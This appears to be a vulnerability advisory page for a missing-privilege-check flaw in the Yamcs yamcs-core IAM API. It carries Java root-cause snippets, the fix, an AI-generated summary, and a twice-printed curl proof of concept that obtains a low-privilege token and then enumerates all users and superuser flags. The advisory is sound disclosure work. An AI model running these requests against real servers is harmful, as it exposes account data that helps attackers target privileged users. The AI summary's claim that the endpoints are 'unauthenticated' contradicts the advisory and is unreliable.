Yamcs vulnerable to unauthorized user enumeration via IAM API endpoints
Description
Summary
The IAM API endpoints (listUsers, getUser, listGroups, and getGroup) in yamcs-core do not enforce the required SystemPrivilege.ControlAccess check. As a result, any authenticated user (even those with low or no privileges) can enumerate all user accounts in the system, including their usernames, superuser status, and group memberships.
This constitutes a broken access control vulnerability (CWE-862) that leaks sensitive user information.
Root
Cause
File: yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java:125,180,357,372
listUsers(), getUser(), listGroups(), and getGroup() do not require SystemPrivilege.ControlAccess. Any authenticated user — regardless of privileges — can enumerate all users, their superuser status, and group memberships:
// listUsers — NO checkSystemPrivilege
public void listUsers(Context ctx, Empty request, ...) {
var sensitiveDetails = ctx.user.hasSystemPrivilege(SystemPrivilege.ControlAccess);
// sensitiveDetails=false for low-priv users, but name/superuser/active still exposed
for (User user : users) {
UserInfo userb = toUserInfo(user, sensitiveDetails, directory);
responseb.addUsers(userb);
}
}
Compare with properly protected endpoints:
// createUser — correctly protected
public void createUser(Context ctx, ...) {
ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // present
Impact
Any authenticated user can:
- List all user accounts in the system
- Identify which accounts have superuser privileges
- Use this information to target privileged accounts
Proof of
Concept
# Authenticate as any low-privilege user GET access_token
curl -s -X POST "http://localhost:8090/auth/token" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "grant_type=password&username=lowpriv&password=lowpriv123"
# Enumerate all users — no ControlAccess required
curl -s "http://TARGET:8090/api/users" \
-H "Authorization: Bearer $TOKEN" #paste access_token
Output (confirmed):
{
"users": [
{ "name": "admin", "superuser": true, "active": true },
{ "name": "operator", "superuser": true, "active": true },
{ "name": "lowpriv", "superuser": false, "active": true }
]
}
Fix
Add ControlAccess check to listUsers, getUser, listGroups, getGroup:
public void listUsers(Context ctx, Empty request, ...) {
ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // ADD THIS
...
}
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authenticated users can enumerate all accounts and superuser flags via unauthenticated IAM API endpoints in yamcs-core.
Vulnerability
The IAM API endpoints listUsers, getUser, listGroups, and getGroup in yamcs-core do not enforce the required SystemPrivilege.ControlAccess check [1][2]. Consequently, any authenticated user, even those with low or no privileges, can enumerate all user accounts in the system, including usernames, superuser status, and group memberships. The vulnerable code resides in yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java at lines 125, 180, 357, and 372 [1][2]. Affected versions are those prior to the fix that adds the missing privilege check.
Exploitation
An attacker needs only a valid authentication token for any low‑privilege user on the system. No special privileges are required. The attacker can send GET requests to the IAM API endpoints (e.g., /api/users) and receive a JSON response containing all user accounts, their superuser status, and group memberships [1][2]. The official proof of concept uses curl with a token obtained from low‑privilege credentials.
Impact
Successful exploitation allows an attacker to list all user accounts in the system, identify which accounts have superuser privileges, and use that information to target privileged accounts [1][2]. This is a broken access control vulnerability (CWE‑862) that leaks sensitive user information [1][2]. No write or code execution is achieved, but the information disclosure significantly aids in further attacks.
Mitigation
A fix was released in yamcs-core that adds the missing ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess) call to the vulnerable endpoints [1][2]. As of the publication date (2026‑05‑27), users should upgrade to the patched version. No workarounds are documented; the only mitigation is to apply the update.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.yamcs:yamcs-coreMaven | < 5.12.7 | 5.12.7 |
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing `SystemPrivilege.ControlAccess` authorization check on four IAM API endpoints allows any authenticated user to enumerate all user accounts."
Attack vector
An attacker who is already authenticated (even with low or no privileges) can call the IAM API endpoints `listUsers`, `getUser`, `listGroups`, or `getGroup` without needing the `SystemPrivilege.ControlAccess` privilege [ref_id=1][ref_id=2]. The attacker sends a simple HTTP GET request to `/api/users` (or similar paths) with a valid bearer token obtained from the `/auth/token` endpoint [ref_id=1][ref_id=2]. The server returns all user accounts including usernames, superuser status, and group memberships, enabling the attacker to identify and target privileged accounts [ref_id=1][ref_id=2].
Affected code
The vulnerable endpoints are in `yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java` at lines 125, 180, 357, and 372 [ref_id=1][ref_id=2]. The methods `listUsers()`, `getUser()`, `listGroups()`, and `getGroup()` all lack a `ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess)` call that is present on properly protected endpoints like `createUser()` [ref_id=1][ref_id=2].
What the fix does
The fix adds `ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess)` as the first line of each vulnerable method (`listUsers`, `getUser`, `listGroups`, `getGroup`) [ref_id=1][ref_id=2]. This mirrors the access control check already present on properly protected endpoints like `createUser()` [ref_id=1][ref_id=2]. By requiring the `ControlAccess` privilege before any user data is returned, the fix ensures that only authorized administrators can enumerate user accounts and their details.
Preconditions
- authAttacker must have a valid authenticated session (any user account, even low-privilege)
- networkThe IAM API endpoints must be exposed and reachable over the network
- configNo special configuration is required; the bug is present in the default code path
Reproduction
```bash # Authenticate as any low-privilege user to obtain an access token curl -s -X POST "http://localhost:8090/auth/token" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "grant_type=password&username=lowpriv&password=lowpriv123"
# Enumerate all users — no ControlAccess required curl -s "http://TARGET:8090/api/users" \ -H "Authorization: Bearer $TOKEN" ``` The response includes all user accounts with their `name`, `superuser`, and `active` fields exposed [ref_id=1][ref_id=2].
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.